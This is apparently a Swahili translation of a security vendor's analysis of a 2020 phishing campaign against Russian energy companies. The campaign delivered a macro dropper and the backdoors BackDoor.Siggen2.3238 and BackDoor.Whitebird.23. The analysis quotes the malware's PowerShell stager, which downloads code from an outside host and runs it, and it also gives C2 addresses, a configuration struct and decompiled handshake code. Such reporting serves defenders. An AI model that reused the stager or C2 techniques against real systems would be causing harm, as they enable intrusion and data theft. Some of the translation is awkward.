Uzoefu wetu katika kuchunguza matukio ya usalama wa kompyuta unaonyesha kuwa barua pepe bado ni mojawapo ya njia zinazotumiwa sana na wavamizi kupenya miundomsingi ya mtandao iliyoshambuliwa. Kitendo kimoja cha kutojali kilicho na barua ya kutiliwa shaka (au isiyotiliwa shaka) inakuwa mahali pa kuingilia maambukizi zaidi, ndiyo maana wahalifu wa mtandao wanatumia kikamilifu mbinu za uhandisi wa kijamii, ingawa kwa viwango tofauti vya mafanikio.
Katika chapisho hili tunataka kuzungumzia uchunguzi wetu wa hivi majuzi kuhusu kampeni ya barua taka inayolenga idadi ya makampuni ya biashara katika kitengo cha mafuta na nishati cha Urusi. Mashambulizi yote yalifuata hali sawa kwa kutumia barua pepe ghushi, na hakuna mtu aliyeonekana kuweka juhudi nyingi katika maandishi ya barua pepe hizi.
Huduma ya ujasusi
Yote ilianza mwishoni mwa Aprili 2020, wakati wachambuzi wa virusi vya Wavuti ya Daktari waligundua kampeni ya barua taka ambayo watapeli walituma saraka ya simu iliyosasishwa kwa wafanyikazi wa idadi ya biashara katika eneo la mafuta na nishati ya Urusi. Bila shaka, hii haikuwa onyesho rahisi la wasiwasi, kwani saraka haikuwa ya kweli, na hati za .docx zilipakua picha mbili kutoka kwa rasilimali za mbali.
Mojawapo ilipakuliwa kwa kompyuta ya mtumiaji kutoka kwa seva ya habari[.]zannews[.]com. Ni vyema kutambua kwamba jina la kikoa ni sawa na kikoa cha kituo cha vyombo vya habari vya kupambana na ufisadi cha Kazakhstan - zannews[.]kz. Kwa upande mwingine, kikoa kilichotumiwa kilikumbusha mara moja kampeni nyingine ya 2015 inayojulikana kama TOPNEWS, ambayo ilitumia mlango wa nyuma wa ICEFOG na ilikuwa na vikoa vya udhibiti wa Trojan vilivyo na "habari" ndogo katika majina yao. Kipengele kingine cha kuvutia kilikuwa kwamba wakati wa kutuma barua pepe kwa wapokeaji tofauti, maombi ya kupakua picha yalitumia vigezo tofauti vya ombi au majina ya kipekee ya picha.
Tunaamini kuwa hili lilifanyika kwa madhumuni ya kukusanya taarifa ili kutambua mpokeaji anwani "anayetegemeka", ambaye angehakikishiwa kufungua barua kwa wakati ufaao. Itifaki ya SMB ilitumiwa kupakua picha kutoka kwa seva ya pili, ambayo inaweza kufanyika kukusanya heshi za NetNTLM kutoka kwa kompyuta za wafanyakazi ambao walifungua hati iliyopokelewa.
Na hapa kuna barua yenyewe na saraka bandia:
Mnamo Juni mwaka huu, wadukuzi walianza kutumia jina jipya la kikoa, sports[.]manhajnews[.]com, ili kupakia picha. Uchanganuzi ulionyesha kuwa vikoa vidogo vya manhajnews[.]com vimetumika katika utumaji barua taka tangu angalau Septemba 2019. Moja ya malengo ya kampeni hii ilikuwa chuo kikuu kikubwa cha Kirusi.
Pia, kufikia Juni, waandaaji wa shambulio hilo walikuja na maandishi mapya kwa barua zao: wakati huu hati hiyo ilikuwa na habari kuhusu maendeleo ya sekta. Maandishi ya barua hiyo yalionyesha wazi kwamba mwandishi wake labda hakuwa mzungumzaji wa asili wa Kirusi, au alikuwa akiunda kwa makusudi maoni kama hayo juu yake mwenyewe. Kwa bahati mbaya, mawazo ya ukuzaji wa tasnia, kama kawaida, yaligeuka kuwa jalada tu - hati ilipakua tena picha mbili, huku seva ilibadilishwa kupakuliwa[.]inklingpaper[.]com.
Ubunifu uliofuata ulifuata mnamo Julai. Katika jaribio la kukwepa ugunduzi wa hati mbaya na programu za antivirus, washambuliaji walianza kutumia hati za Microsoft Word zilizosimbwa kwa nenosiri. Wakati huo huo, washambuliaji waliamua kutumia mbinu ya kawaida ya uhandisi wa kijamii - arifa ya malipo.
Maandishi ya rufaa yaliandikwa tena kwa mtindo uleule, ambao ulizua mashaka ya ziada miongoni mwa walioandikiwa. Seva ya kupakua picha pia haikubadilika.
Kumbuka kuwa katika hali zote, vikoa vya kielektroniki vilivyosajiliwa kwenye barua[.]ru na yandex[.]ru vilitumiwa kutuma barua.
Mashambulio
Mwanzoni mwa Septemba 2020, ilikuwa wakati wa kuchukua hatua. Wachambuzi wetu wa virusi walirekodi wimbi jipya la mashambulizi, ambapo washambuliaji walituma barua tena kwa kisingizio cha uppdatering directory ya simu. Walakini, wakati huu kiambatisho kilikuwa na macro hasidi.
Wakati wa kufungua hati iliyoambatanishwa, macro iliunda faili mbili:
- Hati ya VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, ambayo ilikusudiwa kuzindua faili ya bechi;
- Faili ya bechi yenyewe %APPDATA%configstest.bat, ambayo ilifichwa.
Kiini cha kazi yake kinakuja ili kuzindua ganda la Powershell na vigezo fulani. Vigezo vilivyopitishwa kwenye ganda vimegawanywa kuwa amri:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Kama ifuatavyo kutoka kwa amri zilizowasilishwa, kikoa ambacho upakiaji hupakuliwa hufichwa tena kama tovuti ya habari. rahisi , ambaye kazi yake pekee ni kupokea shellcode kutoka kwa amri na seva ya kudhibiti na kuitekeleza. Tuliweza kutambua aina mbili za milango ya nyuma ambayo inaweza kusakinishwa kwenye Kompyuta ya mwathirika.
BackDoor.Siggen2.3238
Ya kwanza ni BackDoor.Siggen2.3238 - wataalam wetu hawakuwa wamekutana hapo awali, na pia hapakuwa na kutajwa kwa mpango huu na wachuuzi wengine wa antivirus.
Mpango huu ni mlango wa nyuma ulioandikwa katika C++ na unatumia mifumo ya uendeshaji ya Windows 32-bit.
BackDoor.Siggen2.3238 ina uwezo wa kuwasiliana na seva ya usimamizi kwa kutumia itifaki mbili: HTTP na HTTPS. Sampuli iliyojaribiwa hutumia itifaki ya HTTPS. Wakala wa Mtumiaji afuatayo hutumika katika maombi kwa seva:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Katika kesi hii, maombi yote hutolewa na seti zifuatazo za vigezo:
%s;type=%s;length=%s;realdata=%send
ambapo kila mstari %s inabadilishwa na:
- Kitambulisho cha kompyuta iliyoambukizwa,
- aina ya ombi linalotumwa,
- urefu wa data katika uwanja wa data halisi,
- data.
Katika hatua ya kukusanya habari kuhusu mfumo ulioambukizwa, mlango wa nyuma hutoa mstari kama vile:
lan=%s;cmpname=%s;username=%s;version=%s;
ambapo lan ni anwani ya IP ya kompyuta iliyoambukizwa, cmpname ni jina la kompyuta, jina la mtumiaji ni jina la mtumiaji, toleo ni mstari 0.0.4.03.
Maelezo haya yenye kitambulisho cha sysinfo yanatumwa kupitia ombi la POST kwa seva ya udhibiti iliyoko https[:]//31.214[.]157.14/log.txt. Ikiwa kwa kujibu BackDoor.Siggen2.3238 inapokea ishara ya HEART, uunganisho unachukuliwa kuwa umefanikiwa, na mlango wa nyuma huanza mzunguko kuu wa mawasiliano na seva.
Maelezo kamili zaidi ya kanuni za uendeshaji BackDoor.Siggen2.3238 iko ndani yetu .
BackDoor.Whitebird.23
Mpango wa pili ni marekebisho ya BackDoor.Whitebird backdoor, ambayo tayari tunaijua kutokana na tukio na wakala wa serikali nchini Kazakhstan. Toleo hili limeandikwa katika C++ na limeundwa kuendeshwa kwenye mifumo ya uendeshaji ya Windows 32-bit na 64-bit.
Kama programu nyingi za aina hii, BackDoor.Whitebird.23 iliyoundwa ili kuanzisha muunganisho uliosimbwa kwa njia fiche na seva ya udhibiti na udhibiti usioidhinishwa wa kompyuta iliyoambukizwa. Imewekwa kwenye mfumo ulioathiriwa kwa kutumia dropper .
Sampuli tuliyochunguza ilikuwa maktaba hasidi iliyo na mauzo mawili nje:
- Google Play
- Mtihani.
Mwanzoni mwa kazi yake, inasimbua usanidi uliowekwa ngumu kwenye mwili wa nyuma kwa kutumia algorithm kulingana na operesheni ya XOR na byte 0x99. Mpangilio unaonekana kama:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Ili kuhakikisha uendeshaji wake wa mara kwa mara, backdoor inabadilisha thamani iliyotajwa kwenye shamba saa za kazi usanidi. Sehemu ina baiti 1440, ambazo huchukua thamani 0 au 1 na kuwakilisha kila dakika ya kila saa kwa siku. Huunda thread tofauti kwa kila kiolesura cha mtandao kinachosikiliza kiolesura na kutafuta pakiti za uidhinishaji kwenye seva mbadala kutoka kwa kompyuta iliyoambukizwa. Pakiti kama hiyo inapogunduliwa, mlango wa nyuma huongeza habari kuhusu seva ya proksi kwenye orodha yake. Kwa kuongeza, huangalia uwepo wa wakala kupitia WinAPI InternetQueryOptionW.
Programu huangalia dakika na saa ya sasa na kuilinganisha na data iliyo kwenye uwanja saa za kazi usanidi. Ikiwa thamani ya dakika inayolingana ya siku sio sifuri, basi uunganisho umeanzishwa na seva ya kudhibiti.
Kuanzisha muunganisho kwa seva huiga uundaji wa muunganisho kwa kutumia itifaki ya TLS toleo la 1.0 kati ya mteja na seva. Mwili wa mlango wa nyuma una buffers mbili.
Bafa ya kwanza ina kifurushi cha TLS 1.0 Client Hello.
Bafa ya pili ina pakiti za TLS 1.0 za Kubadilishana Ufunguo wa Wateja zenye urefu wa ufunguo wa baiti 0x100, Badilisha Sifa Maalum, Ujumbe Uliosimbwa wa Kupeana Mkono.
Wakati wa kutuma kifurushi cha Hello Mteja, mlango wa nyuma huandika baiti 4 za wakati wa sasa na baiti 28 za data ya nasibu ya uwongo katika sehemu ya Nasibu ya Mteja, iliyokokotolewa kama ifuatavyo:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Pakiti iliyopokelewa inatumwa kwa seva ya kudhibiti. Jibu (pakiti ya Hello ya Seva) hukagua:
- kufuata itifaki ya TLS toleo la 1.0;
- mawasiliano ya muhuri wa muda (baiti 4 za kwanza za uwanja wa pakiti za Takwimu bila mpangilio) iliyoainishwa na mteja kwa muhuri wa muda ulioainishwa na seva;
- mechi ya baiti 4 za kwanza baada ya muhuri wa muda katika uga wa Data Nasibu wa mteja na seva.
Katika kesi ya mechi zilizobainishwa, mlango wa nyuma hutayarisha pakiti ya Ubadilishanaji wa Ufunguo wa Mteja. Ili kufanya hivyo, inarekebisha Ufunguo wa Umma katika kifurushi cha Ubadilishaji Msimbo wa Mteja, pamoja na Usimbaji IV na Data ya Usimbaji katika kifurushi cha Ujumbe Uliosimbwa wa Kushikana kwa Mikono.
Mlango wa nyuma kisha hupokea pakiti kutoka kwa seva ya amri na udhibiti, huangalia kuwa toleo la itifaki ya TLS ni 1.0, na kisha inakubali ka nyingine 54 (mwili wa pakiti). Hii inakamilisha usanidi wa muunganisho.
Maelezo kamili zaidi ya kanuni za uendeshaji BackDoor.Whitebird.23 iko ndani yetu .
Hitimisho na Hitimisho
Uchambuzi wa hati, programu hasidi na miundombinu inayotumika huturuhusu kusema kwa ujasiri kwamba shambulio hilo lilitayarishwa na mojawapo ya vikundi vya APT vya Uchina. Kuzingatia utendaji wa milango ya nyuma ambayo imewekwa kwenye kompyuta za waathirika katika tukio la mashambulizi ya mafanikio, maambukizi husababisha, kwa kiwango cha chini, kwa wizi wa habari za siri kutoka kwa kompyuta za mashirika yaliyoshambuliwa.
Kwa kuongeza, hali inayowezekana sana ni usakinishaji wa Trojans maalum kwenye seva za ndani zilizo na kazi maalum. Hizi zinaweza kuwa vidhibiti vya kikoa, seva za barua, lango la mtandao, n.k. Kama tulivyoweza kuona katika mfano , seva kama hizo zinawavutia washambuliaji kwa sababu mbalimbali.
Chanzo: mapenzi.com